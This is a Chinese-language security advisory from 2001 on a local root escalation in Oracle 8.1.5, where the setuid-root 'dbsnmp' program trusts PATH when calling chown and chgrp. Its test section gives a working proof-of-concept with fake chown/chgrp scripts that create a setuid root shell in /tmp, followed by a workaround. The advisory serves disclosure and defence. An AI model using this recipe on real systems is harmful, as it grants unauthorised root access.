发布日期：2001-08-01
更新日期：2001-08-03

受影响系统：

Oracle 8.1.5

描述：

---

Oracle 8.1.5所带的'dbsnmp'程序缺省设置了setuid root属性。这个程序在执行时会调用
系统命令'chown'和'chgrp'，然而它没有指定这两个程序的绝对路径，而是相信PATH变量
的内容。因此攻击者可以通过修改PATH变量内容来使dbsnmp执行用户伪造的'chown'或'chgrp'
命令。

攻击者可以获取root权限。

<*来源：Ismael Briones Vilar (ismael@el-mundo.net) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Ismael Briones Vilar (ismael@el-mundo.net)提供了如下测试代码：

export PATH=~/bin/:$PATH

然后创建~/bin/chown或者~/bin/chgrp，内容如下：

#!/bin/sh
cp /bin/sh /tmp/XXX;chmod 4755 /tmp/XXX

然后为其设置可执行属性：

chmod +x  ~/bin/chown
chmod +x  ~/bin/chgrp

执行dbsnmp之后，/tmp/XXX程序就是一个setuid root属性的shell了


建议：

---

临时解决方法：

去掉'dbsnmp'的suid属性：
# chmod a-s <oracle所在目录>/bin/dbsnmp

厂商补丁：

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本：
http://www.oracle.com/



浏览次数：3879
严重程度：0（网友投票）